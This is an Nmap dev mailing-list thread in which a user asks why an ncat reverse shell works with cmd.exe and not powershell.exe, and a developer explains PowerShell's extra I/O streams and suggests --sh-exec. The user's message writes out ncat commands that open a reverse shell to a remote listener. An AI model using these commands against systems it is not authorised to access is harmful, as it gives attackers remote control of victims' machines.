Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Netcat powershell bug?

From: Daniel Miller <bonsaiviking () gmail com>
Date: Mon, 23 Jan 2017 07:53:17 -0600
Efrat,

I'm afraid I don't have a solution, but I can guess at the source of the
problem: Ncat does execution by redirecting the three primary I/O streams
to the TCP connection: stdin, stdout, and stderr. Powershell, on the other
hand, has many more output streams. It has streams for progress indication,
logging, error, output, and more. Ncat probably is just not handling this
properly. Also, if it's anything like some Linux commands (like vi, screen,
or anything using ncurses), it can probably read directly from something
like a pseudo terminal device, which is not the stdin stream.

I have not tried this, but you could try executing powershell.exe within
cmd.exe and see if that solves the streams problem: use --sh-exec instead
of -e to do this.

Of course, the canonical answer is to use a feature of Powershell like
Powershell Remoting or even use Powershell code itself to do the TCP
connection instead of using Ncat or another 3rd-party binary.

Dan

On Sun, Jan 22, 2017 at 7:45 AM, Efrat Rozen <efratrozen1983 () gmail com>
wrote:


Hi -im having trouble openening a reverse powershell shell using ncat

im using the executable version of ncat on client windows and runing the
listener on kali using nc -l command.

When i launch this command on my windows target:
ncat.exe [ public ip] [port] -e cmd.exe

it opens a cmd reverse shell perfectly on the kali listener.
but when i use:

ncat.exe [ public ip] [port] -e powershell.exe

it just opend the powershell 'welcome' on kali listener without any option
to type in commands.
can you please offer some sussgestions? ill be happy to donate as well:)

thanks.


_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/


_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: